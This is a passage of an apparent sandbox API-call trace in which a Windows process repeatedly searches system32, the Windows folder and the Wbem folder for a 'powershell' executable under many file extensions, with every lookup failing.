	[0326.906] SetErrorMode (uMode=0x1) returned 0x1
	[0326.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.907] SetErrorMode (uMode=0x1) returned 0x1
	[0326.907] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.907] SetErrorMode (uMode=0x1) returned 0x1
	[0326.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.907] SetErrorMode (uMode=0x1) returned 0x1
	[0326.907] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.907] SetErrorMode (uMode=0x1) returned 0x1
	[0326.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.908] SetErrorMode (uMode=0x1) returned 0x1
	[0326.908] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.908] SetErrorMode (uMode=0x1) returned 0x1
	[0326.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.908] SetErrorMode (uMode=0x1) returned 0x1
	[0326.909] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.909] SetErrorMode (uMode=0x1) returned 0x1
	[0326.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.909] SetErrorMode (uMode=0x1) returned 0x1
	[0326.909] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.909] SetErrorMode (uMode=0x1) returned 0x1
	[0326.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.910] SetErrorMode (uMode=0x1) returned 0x1
	[0326.910] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.910] SetErrorMode (uMode=0x1) returned 0x1
	[0326.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.910] SetErrorMode (uMode=0x1) returned 0x1
	[0326.910] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.911] SetErrorMode (uMode=0x1) returned 0x1
	[0326.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.911] SetErrorMode (uMode=0x1) returned 0x1
	[0326.911] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.911] SetErrorMode (uMode=0x1) returned 0x1
	[0326.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.912] SetErrorMode (uMode=0x1) returned 0x1
	[0326.912] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.912] SetErrorMode (uMode=0x1) returned 0x1
	[0326.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.912] SetErrorMode (uMode=0x1) returned 0x1
	[0326.912] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.912] SetErrorMode (uMode=0x1) returned 0x1
	[0326.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.913] SetErrorMode (uMode=0x1) returned 0x1
	[0326.913] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.913] SetErrorMode (uMode=0x1) returned 0x1
	[0326.913] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.913] SetErrorMode (uMode=0x1) returned 0x1
	[0326.914] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.914] SetErrorMode (uMode=0x1) returned 0x1
	[0326.914] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.914] SetErrorMode (uMode=0x1) returned 0x1
	[0326.914] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.914] SetErrorMode (uMode=0x1) returned 0x1
	[0326.915] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.915] SetErrorMode (uMode=0x1) returned 0x1
	[0326.915] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.915] SetErrorMode (uMode=0x1) returned 0x1
	[0326.915] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.915] SetErrorMode (uMode=0x1) returned 0x1
	[0326.915] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.916] SetErrorMode (uMode=0x1) returned 0x1
	[0326.916] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.916] SetErrorMode (uMode=0x1) returned 0x1
	[0326.916] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.916] SetErrorMode (uMode=0x1) returned 0x1
	[0326.916] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.917] SetErrorMode (uMode=0x1) returned 0x1
	[0326.917] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.917] SetErrorMode (uMode=0x1) returned 0x1
	[0326.917] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.917] SetErrorMode (uMode=0x1) returned 0x1
	[0326.917] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.918] SetErrorMode (uMode=0x1) returned 0x1
	[0326.918] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.918] SetErrorMode (uMode=0x1) returned 0x1
	[0326.918] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.918] SetErrorMode (uMode=0x1) returned 0x1
	[0326.918] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.919] SetErrorMode (uMode=0x1) returned 0x1
	[0326.919] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.919] SetErrorMode (uMode=0x1) returned 0x1
	[0326.919] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.919] SetErrorMode (uMode=0x1) returned 0x1
	[0326.919] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.919] SetErrorMode (uMode=0x1) returned 0x1
	[0326.920] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.920] SetErrorMode (uMode=0x1) returned 0x1
	[0326.920] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.920] SetErrorMode (uMode=0x1) returned 0x1
	[0326.920] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.921] SetErrorMode (uMode=0x1) returned 0x1
	[0326.921] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.921] SetErrorMode (uMode=0x1) returned 0x1
	[0326.921] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.921] SetErrorMode (uMode=0x1) returned 0x1
	[0326.921] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.921] SetErrorMode (uMode=0x1) returned 0x1
	[0326.922] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.922] SetErrorMode (uMode=0x1) returned 0x1
	[0326.922] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.922] SetErrorMode (uMode=0x1) returned 0x1
	[0326.922] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.922] SetErrorMode (uMode=0x1) returned 0x1
	[0326.922] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.923] SetErrorMode (uMode=0x1) returned 0x1
	[0326.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0326.923] SetErrorMode (uMode=0x1) returned 0x1
	[0326.923] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.923] SetErrorMode (uMode=0x1) returned 0x1
	[0326.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0326.924] SetErrorMode (uMode=0x1) returned 0x1
	[0326.924] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.924] SetErrorMode (uMode=0x1) returned 0x1
	[0326.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.268] SetErrorMode (uMode=0x1) returned 0x1
	[0328.268] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.268] SetErrorMode (uMode=0x1) returned 0x1
	[0328.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.269] SetErrorMode (uMode=0x1) returned 0x1
	[0328.269] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c7ddd40 | out: lpFindFileData=0x1c7ddd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.269] SetErrorMode (uMode=0x1) returned 0x1
	[0328.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ddba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.269] SetErrorMode (uMode=0x1) returned 0x1
